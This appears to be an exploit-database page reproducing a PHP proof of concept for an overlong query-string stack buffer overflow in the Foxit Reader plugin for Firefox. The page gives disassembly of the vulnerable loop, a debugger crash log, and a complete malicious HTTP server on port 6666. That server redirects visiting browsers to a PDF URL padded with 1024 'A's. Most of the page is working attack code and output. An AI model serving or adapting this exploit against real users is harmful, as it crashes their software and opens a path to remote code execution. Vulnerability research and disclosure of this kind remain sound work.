扫码分享
验证:
体验盒子
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 | <?php /* Foxit Reader <= 5.4.4.1128 Plugin for Firefox npFoxitReaderPlugin.dll Overlong Query String Remote Stack Buffer Overflow PoC --------------------------- rgod (listener) Tested against Microsoft Windows Mozilla Firefox 17.0.1 Foxit Reader 5.4.3.0920 Foxit Reader 5.4.4.1128 File: npFoxitReaderPlugin.dll Version: 2.2.1.530 Product url: http://www.foxitsoftware.com/downloads/ Last version setup file: FoxitReader544.11281_enu_Setup.exe Usage: Launch from the command line, then browse port 6666 with Firefox. You can test it also through this url: http://192.168.0.1/x.pdf?[A x 1024] File must be existing or the server should be responding with the proper Content-Type header. vulnerable code, npFoxitReaderPlugin.dll: ;------------------------------------------------------------------------------ L1000162F: push ebx push esi push edi mov edi,ebp or ecx,FFFFFFFFh xor eax,eax xor ebx,ebx xor esi,esi repne scasb not ecx dec ecx test ecx,ecx jle L100016E4 L1000164A: mov al,[esi+ebp] mov word ptr [esp+18h],0000h cmp al,25h jz L10001661 mov ecx,[esp+1Ch] mov [ebx+ecx],al jmp L100016CE L10001661: mov al,[esi+ebp+01h] cmp al,30h jl L1000166D cmp al,39h jle L1000167D L1000166D: cmp al,41h jl L10001675 cmp al,46h jle L1000167D L10001675: cmp al,61h jl L100016C6 cmp al,66h jg L100016C6 L1000167D: mov dl,[esi+ebp+01h] inc esi inc esi lea ecx,[esp+10h] mov [esp+18h],dl push ecx mov al,[esi+ebp] lea edx,[esp+1Ch] push L100450D4 push edx mov [esp+25h],al call SUB_L10006421 mov eax,[esp+1Ch] lea ecx,[esp+24h] push eax push L100450D0 push ecx call SUB_L100063CF mov eax,[esp+34h] mov dl,[esp+30h] add esp,00000018h mov [ebx+eax],dl jmp L100016CE L100016C6: mov ecx,[esp+1Ch] mov byte ptr [ebx+ecx],25h L100016CE: inc ebx mov edi,ebp or ecx,FFFFFFFFh xor eax,eax inc esi repne scasb not ecx dec ecx cmp esi,ecx jl L1000164A L100016E4: mov edx,[esp+1Ch] pop edi pop esi mov eax,00000001h mov byte ptr [ebx+edx],00h pop ebx pop ebp pop ecx retn ;------------------------------------------------------------------------------ this copy loop ends up in overwriting stack pointers, then (by attaching to plugin-container.exe): (f48.1778): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0076ed4c ebx=00000341 ecx=002cf414 edx=002cf414 esi=41414141 edi=0076e9e8 eip=10016852 esp=002cf3f8 ebp=75eacdf8 iopl=0 nv up ei pl nz na po nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010202 npFoxitReaderPlugin!NP_GetEntryPoints+0x15672: 10016852 8906mov dword ptr [esi],eaxds:0023:41414141=???????? ... Attempt to write to address 41414141 ... also SEH pointers are overwritten */ error_reporting(0); set_time_limit(0); $port = 6666; $____redirect = "HTTP/1.1 301 Moved Permanently\r\n". "Server: Apache\r\n". "Location: /x.pdf?".str_repeat("A",1024)."\r\n". "Content-Type: text/html\r\n\r\n"; $____boom = "HTTP/1.1 200 OK\r\n". "Server: Apache\r\n". "Accept-Ranges: bytes\r\n". "Content-Length: 60137\r\n". "Content-Type: application/pdf\r\n". "Connection: keep-alive\r\n\r\n"; $socket = stream_socket_server("tcp://0.0.0.0:".$port, $errno, $errstr); if (!$socket) { echo "$errstr ($errno)\n"; } else { echo "Listening on public tcp port ".$port." \n"; while ($conn = stream_socket_accept($socket)) { $line=fgets($conn); echo $line."\n"; if (strpos($line,".pdf")){ fwrite($conn,$____boom); } else { fwrite($conn,$____redirect); } fclose($conn); } fclose($socket); } ?> |
体验盒子
